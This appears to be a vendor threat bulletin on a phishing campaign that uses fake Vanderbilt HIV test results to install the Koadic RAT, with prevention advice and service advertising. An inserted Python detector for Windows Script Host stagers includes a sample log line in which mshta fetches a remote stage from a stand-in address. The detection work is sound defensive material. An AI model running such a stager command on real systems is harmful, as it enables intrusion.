KOADIC HEALTHCARE CAMPAIGN

Cybersecurity researchers have uncovered a new phishing campaign that uses fake HIV test results to lure victims into clicking a malicious link.  This underhanded campaign has been detected targeting insurance, healthcare, and pharmaceutical companies.  In the latest version of the scam, cyber threat analysts observed cybercriminals impersonating Vanderbilt University Medical Center and sending out fake HIV test result emails.  Recipients were encouraged to open malicious content embedded into the message, which triggered the installation of Koadic RAT.  Once installed, the malware can take complete control of a user's system, running programs on the infected device and accessing victims’ data, including sensitive, personal, and financial information.[1]

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit like other penetration testing tools such as Meterpreter and PowerShell Empire.  The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.  It is possible to serve payloads completely in memory from stage 0 onward, as well as to use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).  Recent versions of Koadic were developed on Python 3.
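Detection logic for the delivery pattern described above, added here as an example and not code from the article or from Koadic itself: it scans process-creation records for Windows Script Host (and the other JScript/VBScript hosts) launched directly from a mail or Office client, or with a URL or script moniker on the command line, which is what a stage served from a remote host and run in memory looks like in endpoint telemetry. The record format, the process-name lists and the sample records are assumptions made for this example.

```python
import re

# Windows Script Host and the other hosts that execute JScript/VBScript
# (the runtime Koadic-style stagers depend on, per the paragraph above).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# A script host spawned directly by a mail or Office client usually means
# a user opened something that arrived by e-mail.
MAIL_OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
# Traits of a remotely served, in-memory stage: a URL or a script moniker
# (script:, vbscript:, javascript:) on the command line instead of a file on disk.
REMOTE_STAGE_RE = re.compile(r"(https?://|script:)", re.IGNORECASE)

def parse_event(line: str) -> dict:
    """Parse one 'Key=Value|Key=Value' process-creation record (constructed format)."""
    return dict(f.split("=", 1) for f in line.strip().split("|") if "=" in f)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_wsh_stagers(log_text: str) -> list:
    """Return one finding dict per record that looks like a WSH-based stager launch."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), start=1):
        ev = parse_event(line)
        image = basename(ev.get("Image", ""))
        if image not in SCRIPT_HOSTS:
            continue  # ordinary process, not a script host
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        reasons = []
        if parent in MAIL_OFFICE_PARENTS:
            reasons.append(f"script host spawned by {parent}")
        if REMOTE_STAGE_RE.search(cmd):
            reasons.append("command line loads remote/in-memory content")
        if reasons:  # a bare local script run (e.g. admin maintenance) is not flagged
            findings.append({"line": n, "image": image, "reason": "; ".join(reasons)})
    return findings

# Constructed sample records (not real telemetry); 203.0.113.10 is a documentation address.
SAMPLE_LOG = r"""
ParentImage=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe http://203.0.113.10/results
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe results.txt
ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\wscript.exe|CommandLine=wscript.exe C:\Users\u\AppData\Local\Temp\TestResults.vbs
ParentImage=C:\Windows\System32\svchost.exe|Image=C:\Windows\System32\wscript.exe|CommandLine=wscript.exe C:\ProgramData\maint\cleanup.vbs
"""

if __name__ == "__main__":
    for f in detect_wsh_stagers(SAMPLE_LOG):
        print(f"record {f['line']}: {f['image']} -> {f['reason']}")
```

Of the four constructed records, only the first and third are flagged: the svchost-launched local script in the last record matches neither the parent rule nor the remote-content rule.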

The control it gives attackers has made Koadic popular among many threat actors in recent years, particularly those thought to be state sponsored by the People's Republic of China, the Russian Federation, and Iran.  Though criminally accomplished, the attackers in this instance made a stupid error in putting together the text of their egregious email, misspelling Vanderbilt as "Vanderbit."  This latest campaign serves as a reminder that health-related lures did not start and will not stop with the recent Coronavirus-themed emails, which will only increase due to government and media attention.  These emails are just another tactic used by attackers to gain access to systems and networks.  Cyber threat analysts have advised all users to (always) think before they click and to consider that healthcare professionals are very unlikely to send sensitive information such as the results of an HIV test over email.

Under HIPAA privacy regulations, insurance companies and healthcare providers typically transmit sensitive health-related information only through secured messaging portals, over the phone after verifying the identity of the person on the line, or in person.

If you receive an email that claims to have sensitive health-related information, do not open the attachments.  Instead, visit your medical provider’s patient portal directly, call your doctor’s office to verify, or make an appointment to confirm any medical diagnosis or test results face to face.

Red Sky Alliance has been analyzing and documenting cyber threats for 8 years and maintains a resource library of malware and cyber actor reports.

The installation, updating and monitoring of firewalls, cyber security and proper employee training are keys to blocking attacks.  Please feel free to contact our analyst team for research assistance and Cyber Threat Analysis on your organization.

What can you do to better protect your organization today?

  • All data in transmission and at rest should be encrypted.
  • Proper data back-up and off-site storage policies should be adopted and followed.
  • Update disaster recovery plans and emergency procedures with cyber threat recovery procedures.
  • Institute cyber threat and phishing training for all employees, with testing and updating.
  • Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.
  • Ensure that all software updates and patches are installed immediately.
  • Enroll your company/organization in RedXray for daily notifications of cyber threats directed at your domains. The RedXray service is $500 a month and provides threat intelligence on nine (9) cyber threat categories, including keyloggers, without having to connect to your network.
  • Purchase annual cyber insurance coverage from Red Sky Alliance, provided by Cysurance.

Conclusion

Red Sky Alliance strongly recommends ongoing monitoring from both internal and external perspectives.  Internal monitoring is common practice.  However, external threats are often overlooked and can represent an early warning of impending attacks.  Red Sky Alliance can provide internal monitoring in tandem with RedXray notifications on external threats, including botnet activity, public data breaches, phishing, fraud, and general targeting.  Red Sky Alliance is located in New Boston, NH, USA.  We are a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com

Interested in a RedXray subscription to see what we can do for you?  Sign up here: https://www.wapacklabs.com/redxray  

Reporting: https://www.redskyalliance.org/

Website: https://www.wapacklabs.com/

LinkedIn: https://www.linkedin.com/company/wapacklabs/

Twitter: https://twitter.com/wapacklabs?lang=en

[1] https://www.beckershospitalreview.com/cybersecurity/hackers-impersonate-vanderbilt-university-medical-center-to-lure-victims-in-phishing-attacks.html